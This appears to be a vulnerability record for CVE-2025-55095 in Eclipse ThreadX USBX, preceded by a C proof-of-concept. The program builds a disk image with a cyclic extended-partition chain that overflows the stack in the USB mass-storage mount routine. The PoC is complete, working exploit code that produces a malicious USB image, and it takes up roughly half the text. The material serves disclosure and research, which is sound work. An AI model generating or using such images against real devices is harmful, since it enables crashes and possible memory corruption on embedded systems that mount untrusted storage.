CVE-2025-55095

#include <stdio.h> #include <stdlib.h> #include <string.h> // PoC: Create a malicious disk image with cyclic extended partition chain // to trigger stack overflow in _ux_host_class_storage_media_mount() #pragma pack(push, 1) typedef struct { unsigned char status; unsigned char start_head; unsigned short start_sector:6; unsigned short start_cylinder:10; unsigned char type; unsigned char end_head; unsigned short end_sector:6; unsigned short end_cylinder:10; unsigned int relative_sectors; unsigned int total_sectors; } PartitionEntry; typedef struct { unsigned char bootstrap[446]; PartitionEntry partitions[4]; unsigned short signature; } MBR; #pragma pack(pop) void create_malicious_image(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { perror("Failed to create image"); return; } MBR mbr = {0}; // Primary partition 1: Normal partition mbr.partitions[0].status = 0x80; mbr.partitions[0].type = 0x0C; // FAT32 LBA mbr.partitions[0].relative_sectors = 2048; mbr.partitions[0].total_sectors = 102400; // Primary partition 2: Extended partition (entry point to chain) mbr.partitions[1].status = 0x00; mbr.partitions[1].type = 0x0F; // Extended partition mbr.partitions[1].relative_sectors = 104448; mbr.partitions[1].total_sectors = 102400; // Set EBR chain: Each EBR points back to sector 104448 (cyclic) // This creates infinite recursion in _ux_host_class_storage_media_mount() unsigned int ebr_sector = 104448; for (int i = 0; i < 100; i++) { // Create deep chain fseek(fp, ebr_sector * 512, SEEK_SET); MBR ebr = {0}; ebr.partitions[0].type = 0x07; // NTFS ebr.partitions[0].relative_sectors = 1; ebr.partitions[0].total_sectors = 2047; // Extended partition points to next EBR (creates cycle) if (i < 99) { ebr.partitions[1].type = 0x0F; ebr.partitions[1].relative_sectors = 2048; ebr.partitions[1].total_sectors = 2048; ebr_sector = ebr_sector + 2048; } else { // Last EBR points back to first EBR (cycle) ebr.partitions[1].type = 0x0F; ebr.partitions[1].relative_sectors = 104448; ebr.partitions[1].total_sectors = 2048; } ebr.signature = 0xAA55; fwrite(&ebr, sizeof(MBR), 1, fp); } mbr.signature = 0xAA55; fseek(fp, 0, SEEK_SET); fwrite(&mbr, sizeof(MBR), 1, fp); fclose(fp); printf("Malicious image created: %s\n", filename); printf("Contains cyclic extended partition chain (100 EBRs forming cycle)\n"); } int main() { create_malicious_image("malicious_usb_image.img"); return 0; }

{"cve": {"id": "CVE-2025-55095", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.930", "lastModified": "2026-04-02T20:28:48.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The function _ux_host_class_storage_media_mount() is responsible for mounting partitions on a USB mass storage device. When it encounters an extended partition entry in the partition table, it recursively calls itself to mount the next logical partition.\n\nThis recursion occurs in _ux_host_class_storage_partition_read(), which parses up to four partition entries. If an extended partition is found (with type UX_HOST_CLASS_STORAGE_PARTITION_EXTENDED or EXTENDED_LBA_MAPPED), the code invokes:\n _ux_host_class_storage_media_mount(storage, sector + _ux_utility_long_get(...));\n\n\nThere is no limit on the recursion depth or tracking of visited sectors. As a result, a malicious or malformed disk image can include cyclic or excessively deep chains of extended partitions, causing the function to recurse until stack overflow occurs."}, {"lang": "es", "value": "La función _ux_host_class_storage_media_mount() es responsable de montar particiones en un dispositivo de almacenamiento masivo USB. Cuando encuentra una entrada de partición extendida en la tabla de particiones, se llama a sí misma recursivamente para montar la siguiente partición lógica.\n\nEsta recursión ocurre en _ux_host_class_storage_partition_read(), que analiza hasta cuatro entradas de partición. Si se encuentra una partición extendida (con el tipo UX_HOST_CLASS_STORAGE_PARTITION_EXTENDED o EXTENDED_LBA_MAPPED), el código invoca:\n _ux_host_class_storage_media_mount(storage, sector + _ux_utility_long_get(...));\n\nNo hay límite en la profundidad de recursión ni seguimiento de los sectores visitados. Como resultado, una imagen de disco maliciosa o malformada puede incluir cadenas cíclicas o excesivamente profundas de particiones extendidas, lo que hace que la función recurra hasta que ocurra un desbordamiento de pila."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-674"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:threadx_usbx:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.4.2", "matchCriteriaId": "DF35E739-A6C8-4A49-B499-ED473CE276CF"}]}]}], "references": [{"url": "https://github.com/eclipse-threadx/usbx/security/advisories/GHSA-qfmp-wch9-rpv2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}